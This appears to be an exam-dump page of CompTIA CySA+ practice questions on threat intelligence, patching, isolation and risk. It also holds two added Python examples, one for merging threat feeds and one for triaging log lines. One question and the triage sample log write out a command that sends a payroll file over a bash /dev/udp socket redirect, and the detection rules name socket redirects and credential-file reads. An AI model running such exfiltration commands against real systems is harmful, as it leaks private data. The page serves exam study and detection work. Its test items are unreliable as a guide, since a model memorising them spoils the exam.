CS0-002 Exam Details

  • Exam Code: CS0-002
  • Exam Name: CompTIA Cybersecurity Analyst (CySA+)
  • Certification: CompTIA Certifications
  • Vendor: CompTIA
  • Total Questions: 1059 Q&As
  • Last Updated: May 30, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 721:

    A security analyst is required to stay current with the most recent threat data and intelligence reports. When gathering data, it is MOST important for the data to be:

    A. proprietary and timely
    B. proprietary and accurate
    C. relevant and deep
    D. relevant and accurate

  • Question 722:

    A monthly job to install approved vendor software updates and hot fixes recently stopped working. The security team performed a vulnerability scan, which identified several hosts as having some critical OS vulnerabilities, as referenced in the common vulnerabilities and exposures (CVE) database.

    Which of the following should the security team do NEXT to resolve the critical findings in the most effective manner? (Choose two.)

    A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.
    B. Remove the servers reported to have high and medium vulnerabilities.
    C. Tag the computers with critical findings as a business risk acceptance.
    D. Manually patch the computers on the network, as recommended on the CVE website.
    E. Harden the hosts on the network, as recommended by the NIST framework.
    F. Resolve the monthly job issues and test them before applying them to the production network.

  • Question 723:

    Which of the following policies would state an employee should not disable security safeguards, such as host firewalls and antivirus on company systems?

    A. Code of conduct policy
    B. Account management policy
    C. Password policy
    D. Acceptable use policy

  • Question 724:

    A worm was detected on multiple PCs within the remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

    A. Logical isolation of the remote office
    B. Sanitization of the network environment
    C. Segmentation of the network
    D. Secure disposal of affected systems

  • Question 725:

    In system hardening, which of the following types of vulnerability scans would work BEST to verify the scanned device meets security policies?

    A. SCAP
    B. Burp Suite
    C. OWASP ZAP
    D. Unauthenticated

  • Question 726:

    Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user's web application?

    A. Deploying HIPS to block malicious ActiveX code
    B. Installing network-based IPS to block malicious ActiveX code
    C. Adjusting the web-browser settings to block ActiveX controls
    D. Configuring a firewall to block traffic on ports that use ActiveX controls

  • Question 727:

    An organization is required to be able to consume multiple threat feeds simultaneously and to provide actionable intelligence to various teams. The organization would also like to be able to leverage the intelligence to enrich security event data. Which of the following functions would most likely help the security analyst meet the organization's requirements?

    A. Vulnerability management
    B. Risk management
    C. Detection and monitoring
    D. Incident response

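The requirement in Question 727 (consume several feeds at once, then use the result to enrich event data) is easier to picture with code. The following is an added example written for this page, not CompTIA's material or any vendor's product. It assumes each feed delivers records with a type, a value, a 0-100 confidence and tags; the feed contents and the events are constructed, using documentation address ranges. Indicators from all feeds are folded into one table keyed by normalized (type, value), so the same IP reported by two feeds becomes one entry with the highest confidence, the union of tags and both sources, and events are then enriched by exact match or by the most specific covering network.

```python
import ipaddress

# Constructed feed snapshots for the example (not real intelligence). Each feed
# is assumed to deliver records with type, value, confidence (0-100) and tags.
FEEDS = {
    "feed_a": [
        {"type": "ipv4", "value": "198.51.100.23", "confidence": 80, "tags": ["c2", "botnet-x"]},
        {"type": "domain", "value": "Update-Check.example", "confidence": 60, "tags": ["phishing"]},
    ],
    "feed_b": [
        {"type": "ipv4", "value": "198.51.100.23", "confidence": 95, "tags": ["c2"]},
        {"type": "ipv4-net", "value": "203.0.113.0/24", "confidence": 50, "tags": ["scanner"]},
    ],
}


def normalize(ind):
    """Canonical (type, value) key so the same indicator from two feeds collides."""
    kind, value = ind["type"], ind["value"].strip().lower()
    if kind == "ipv4":
        value = str(ipaddress.ip_address(value))
    elif kind == "ipv4-net":
        value = str(ipaddress.ip_network(value, strict=False))
    return kind, value


def merge_feeds(feeds):
    """Fold every feed into one table: max confidence, union of tags, set of sources."""
    table = {}
    for name, records in feeds.items():
        for ind in records:
            entry = table.setdefault(normalize(ind),
                                     {"confidence": 0, "tags": set(), "sources": set()})
            entry["confidence"] = max(entry["confidence"], int(ind["confidence"]))
            entry["tags"].update(ind.get("tags", []))
            entry["sources"].add(name)
    return table


def lookup_ip(table, ip):
    """Exact address match first, otherwise the most specific covering network."""
    addr = ipaddress.ip_address(ip)
    exact = table.get(("ipv4", str(addr)))
    if exact:
        return str(addr), exact
    best = None
    for (kind, value), entry in table.items():
        if kind != "ipv4-net":
            continue
        net = ipaddress.ip_network(value)
        if addr in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, value, entry)
    return (best[1], best[2]) if best else None


def _match(field, observed, indicator, entry):
    return {
        "field": field,
        "observed": observed,
        "indicator": indicator,
        "confidence": entry["confidence"],
        "tags": sorted(entry["tags"]),
        "sources": sorted(entry["sources"]),
    }


def enrich(event, table):
    """Return a copy of the event with matched intelligence attached."""
    matches = []
    if "dst_ip" in event:
        hit = lookup_ip(table, event["dst_ip"])
        if hit:
            matches.append(_match("dst_ip", event["dst_ip"], hit[0], hit[1]))
    if "domain" in event:
        key = ("domain", event["domain"].strip().lower())
        if key in table:
            matches.append(_match("domain", event["domain"], key[1], table[key]))
    enriched = dict(event)
    enriched["ti_matches"] = matches
    enriched["ti_confidence"] = max((m["confidence"] for m in matches), default=0)
    return enriched


if __name__ == "__main__":
    table = merge_feeds(FEEDS)
    # Constructed events, e.g. firewall/proxy records already normalized by the SIEM.
    for ev in ({"src_ip": "10.0.0.5", "dst_ip": "198.51.100.23"},
               {"src_ip": "10.0.0.9", "dst_ip": "203.0.113.77"},
               {"src_ip": "10.0.0.9", "domain": "update-check.example"},
               {"src_ip": "10.0.0.3", "dst_ip": "192.0.2.1"}):
        print(enrich(ev, table))
```

The merged table is what makes the intelligence actionable for different consumers: the SOC can route on ti_confidence, the IR team on tags, and the feed-management owner on sources. Normalizing before merging matters; without it the mixed-case domain and the two copies of the same IP would appear as separate, lower-confidence indicators.

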
  • Question 728:

    A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

    A. nmap -A -sV 192.168.1.235
    B. cat payroll.csv > /dev/udp/123.456.123.456/53
    C. cat /etc/passwd
    D. mysql -h 192.168.1.235 -u test -p

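Question 728 turns on recognizing that `cat file > /dev/udp/<host>/<port>` is bash opening a network socket through its /dev/tcp and /dev/udp pseudo-devices, so a payroll file sent that way to port 53 is data leaving the network, not a diagnostic. The following is an added example for this page, not exam content, showing how that kind of triage can be expressed as ordered detection rules over command-audit log lines. The log format (timestamp, host, user=, cmd="...") and the five log lines are constructed; the exfiltration line uses a TEST-NET documentation address rather than the question's literal string.

```python
import re
from dataclasses import dataclass

# Constructed sample command-audit entries (not real logs). Assumed format:
#   <timestamp> <host> user=<name> cmd="<command line>"
SAMPLE_LOG = """\
2024-03-01T10:02:11Z ops-jump01 user=alice cmd="nmap -A -sV 192.168.1.235"
2024-03-01T10:03:47Z ops-jump01 user=bob cmd="cat payroll.csv > /dev/udp/203.0.113.45/53"
2024-03-01T10:04:02Z ops-jump02 user=carol cmd="cat /etc/passwd"
2024-03-01T10:05:19Z ops-jump02 user=dave cmd="mysql -h 192.168.1.235 -u test -p"
2024-03-01T10:06:00Z ops-jump03 user=erin cmd="ls -la /var/log"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')

# Rules are ordered from most to least severe; the first match wins.
# Severity 4 means "requires immediate attention".
RULES = [
    (4, "output redirected to bash /dev/tcp or /dev/udp: data exfiltration over a raw socket",
     re.compile(r'>\s*/dev/(tcp|udp)/\S+/\d+')),
    (3, "read of a credential or identity file",
     re.compile(r'\b(cat|less|more|head|tail|cp)\s+.*?/etc/(shadow|passwd|sudoers)\b')),
    (2, "port scan / service enumeration from an operator host",
     re.compile(r'\bnmap\b')),
    (1, "interactive database login with an explicit user",
     re.compile(r'\bmysql\b.*\s-u\s')),
]


@dataclass
class Finding:
    severity: int
    user: str
    host: str
    cmd: str
    reason: str


def parse_line(line):
    """Return the fields of one audit line, or None if it does not fit the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def triage(log_text):
    """Match every parsable line against RULES; return findings, most severe first."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        for sev, label, rx in RULES:
            if rx.search(rec["cmd"]):
                findings.append(Finding(sev, rec["user"], rec["host"], rec["cmd"], label))
                break  # rules are ordered, so the first hit is the most severe
    findings.sort(key=lambda f: -f.severity)  # stable sort keeps log order within a tier
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[sev {f.severity}] {f.user}@{f.host}: {f.cmd}\n    {f.reason}")
```

The rule for /dev/tcp and /dev/udp is the one to keep even if the others are tuned out: nmap from an operator jump host and a mysql login may be routine, and reading /etc/passwd is common on systems without shadow passwords, but there is no routine reason for an operator to stream a file into a bash socket redirect, least of all to UDP 53 where it blends in with DNS.

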
  • Question 729:

    A security analyst is reviewing packet captures for a specific server that is suspected of containing malware and discovers the following packets: Which of the following traffic patterns or data would be MOST concerning to the security analyst?

    A. Port used for SMTP traffic from 73.252.34.101
    B. Unencrypted password sent from 103.34.243.12
    C. Anonymous access granted by 103.34.243.12
    D. Ports used for HTTP traffic from 202.53.245.78

  • Question 730:

    A security analyst is providing a risk assessment for a medical device that will be installed on the corporate network. During the assessment, the analyst discovers the device has an embedded operating system that will be at the end of its life in two years. Due to the criticality of the device, the security committee makes a risk-based policy decision to review and enforce the vendor upgrade before the end of life is reached. Which of the following risk actions has the security committee taken?

    A. Risk exception
    B. Risk avoidance
    C. Risk tolerance
    D. Risk acceptance

Tips on How to Prepare for the Exams

Nowadays, certification exams are becoming more important and are required by more and more enterprises when applying for a job. But how do you prepare for the exam effectively? How do you prepare in a short time with less effort? How do you get an ideal result, and how do you find the most reliable resources? Here on Vcedump.com you will find all the answers. Vcedump.com provides not only CompTIA exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are confused about your CS0-002 exam preparation and CompTIA certification application, do not hesitate to visit Vcedump.com to find your solutions.